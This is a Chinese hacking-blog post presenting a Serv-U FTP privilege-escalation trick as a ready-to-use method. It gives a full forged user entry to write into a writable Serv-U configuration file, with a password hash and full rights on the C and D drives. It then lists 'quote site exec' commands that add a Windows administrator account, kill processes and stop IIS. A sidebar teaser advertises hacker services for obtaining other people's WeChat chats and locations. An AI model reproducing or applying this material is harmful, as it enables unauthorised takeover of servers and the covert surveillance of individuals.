一个绝对能用的Serv-U提权技巧

访客4年前黑客文章399

有段时间提权,发现SU提权时候SU配置文件可写,可是不知道怎么写,正好有个服务器上装的SU就自己配置了一个,然后复制到待提权的机器上,发现很好用。为方便大家就发出来共享下。。。。 

  User数字(第几个用户看服务器上,比方已经有10个那这写11)=用户名|1|0这个是是否生效用户的属性(这段是在最上面用户排列里面,下面的写到配置文件更底)

  [USER=用户名|1]

  Password=这个是密码=随机的两个字母+密码的32位MD5(我看了几个服务器上面的随机的两个字母基本上都是密码前两位)有的不加密。今天拿个服务器就没加40多个FTP用户密码。。呵呵

  HomeDir=d:\ 这个是登陆时的工作目录

  PasswordLastChange=1234233287这个不清楚,不动他就行

  TimeOut=600 超时时间

  Access1=C:\|RWAMELCDP 我这个是前面是目录后面是目录的属性全部包括读写移动复制执行

  Access2=D:\|RWAMELCDP

  下面是一个样板

  账号密码都为wlke.C,D盘全部属性都有

  User67=wlke|1|0

  [USER=wlke|1]

  Password=wl27f6b939142a0ba469073da622db84f7

  HomeDir=d:\

  PasswordLastChange=1234233287

  TimeOut=600

  Access1=D:\|RWAMELCDP

  Access2=C:\|RWAMELCDP

  这样我们用CMD FTP上去,加用户什么的都行,可以直接执行CMD。

  FTP执行命令也一起发下。

  quote site exec 后面加你要执行的CMD命令

  举例

  quote site exec net user 无忧公子 123456 /add 添加用户无忧公子

  quote site exec net localhost administrators 无忧公子 /add 把用户 无忧公子 添加到管理员组

  quote site exec tskill PID 在 Win 2003 中通过 PID 关闭进程

  quote site exec tskill notepad 在 Win 2003 中通过名称关闭同类的进程

  quote site exec net stop iisadmin 停止 iis 服务

  quote site exec net start iisadmin 启动 iis 服务

  。。。。。。

  好了。有点累。

  原创的,希望老鸟也支持下

  谢谢。睡觉去了。。。。大家做个好梦

标签: 好话题

相关文章

终于找到黑客拿到别人微信聊天记录定位软件"定位追踪-免费接单

终于找到黑客拿到别人微信聊天记录定位软件"定位追踪-免费接单 一般来说,女生和男生在很多方面的想法是不一样的,女生分开可能就足够迷路了。 想主动离开你的人会怎么逼你呢 1.然而,男孩有上千种让女...

网站质量差怎么办?影响网站整体质量的36个因素_新浪科技

简而言之,高质量的网站是提供相关的,有用的内容和良好的用户体验的网站,但是,除此之外,还需要考虑许多其他因素。 在网站上花很多钱并不能保证它被归类为高质量网站,实际上,只要肯花时间和精力进行投资,就...

可检测Tor流量中Android应用活动的模式的新算法面世_黑客

意大利学者开发了一种可以检测Tor流量中Android应用活动的模式的算法,其准确率为97%。该算法不是去匿名化脚本,因为它无法显示用户的真实IP地址或其他识别细节。但是,它将揭示Tor用户是否正在使...

工行密码器没电了怎么办(工行密码器激活码怎么查)

关于安全使用工行电子密码器的提示 尊敬的客户: 工银电子密码器是工行为您提供的一款电子银行安全产品,是具有内置电源和密码生成芯片、外带显示屏和数字键盘的硬件介质,您无需安装任何程序即可在网...

做家务的男人2019 如何看待男人经常做家务

我得说一个真正的例子。a man,近50岁,公司外贸部经理,年薪30万米以上。一天早上,他去上班的时候,跑过来说:“老程(我父亲),你身上有钱吗?”借我十米做早餐。我有低血糖症。我爸爸拿出20米给他,...

黑客盗取微信支付密码,你陷入圈套了吗?

现在,随着网络的进步,我相信我们平时使用的社交软件也有很多。平时在交流中,我们大多数人使用的是微信吧。这是一个很好的社交软件,而且,它让我们有了很好的体验,在使用时也是非常方便和快捷的。移动支付已经成...